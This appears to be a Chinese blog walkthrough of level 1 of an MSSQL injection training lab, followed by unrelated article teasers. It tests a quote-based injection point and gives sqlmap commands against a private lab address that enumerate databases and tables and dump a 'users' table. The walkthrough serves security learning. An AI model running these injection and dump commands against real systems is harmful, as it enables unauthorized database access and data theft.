MSSQL 工具注入(第一关)

news/2024/12/22 9:01:11/

简介

     SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

 

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

 使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

 

六、得到表中的数据

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民


http://www.ppmy.cn/news/1517587.html

相关文章

全能型AI与专业型AI的未来之争:谁将引领下一个科技浪潮?

在人工智能飞速发展的今天,AI技术正不断深入各行各业。近日,OpenAI宣布将在秋季推出代号为“草莓”的全新AI模型。这一全能型AI不仅能够处理复杂的数学问题,还能制定主观的营销策略,展现出惊人的多样性和适应性。这让人不禁思考&a…

Vue项目中Axios取消请求功能实现

1,封装axios实例 request.js const axios require(axios);// 创建一个axios实例 const service axios.create({baseURL: "https://ip:port",timeout: 60000 });export default service 2,封装请求 api.js import service from request im…

动手学深度学习(pytorch)学习记录18-层和块[学习记录]

在具有单一输出的线性模型中 单个神经网络完成这几项工作 : (1)接受一些输入; (2)生成相应的标量输出; (3)具有一组相关 参数(parameters)&#x…

虚幻5|(1)技能栏快捷格子的制作|(2)如何在游戏进行的时候显示鼠标,使用鼠标操作UI||(3)改进技能释放

一.创建技能栏格子UI 1.创建一个UI控件蓝图,命名为技能栏格子(如何创建我就不多说了,学到这了基础知识应该有所掌握了) 2.添加一个边界和垂直框 3.选中边界,右侧细节栏更改如下 4.再拖入一个文本块,做垂直…

K8s系列之:K8s OPERATOR是什么

K8s系列之:K8s OPERATOR是什么 一、K8s OPERATOR是什么二、Operator 如何管理 Kubernetes 应用三、Operator 框架四、Operator 模式五、Kubernetes 上的 Operator六、Operator 示例七、部署 Operator八、使用 Operator九、编写你自己的 Operator十、java-operator-s…

python创建虚拟环境并在pycharm引用

创建虚拟环境 下面操作在cmd中执行 创建新的虚拟环境: python -m venv 环境名 激活虚拟环境: 对于 Windows: 环境名\Scripts\activate 对于 Linux 或 macOS: source 环境名/bin/activate 在虚拟环境中安装 Pandas 和 Numpy&am…

视频图像处理基础--运动目标检测与识别

系列文章目录 文章目录 系列文章目录前言一、视频图像处理二、运动目标检测与识别--帧差法2.1 帧差法2.2 算法原理2.3 利用帧差法进行目标检测的方法2.4 相邻帧帧间差分法的优势和不足2.5 改进的帧间差分法 三、运动目标检测与识别--背景减法3.1 背景减法3.2 算法原理3.3 背景建…

android 将新建的底部导航的demo,修改首页默认显示的字符串为helloworld。

1、先上个图,demo建好了以后,默认显示一个字符串: 2、这个demo的结构: activity_main.xml中用navGraph与其关联。 3、增加方法,给text赋值: package com.example.helloworld.ui.homeimport androidx.lifec…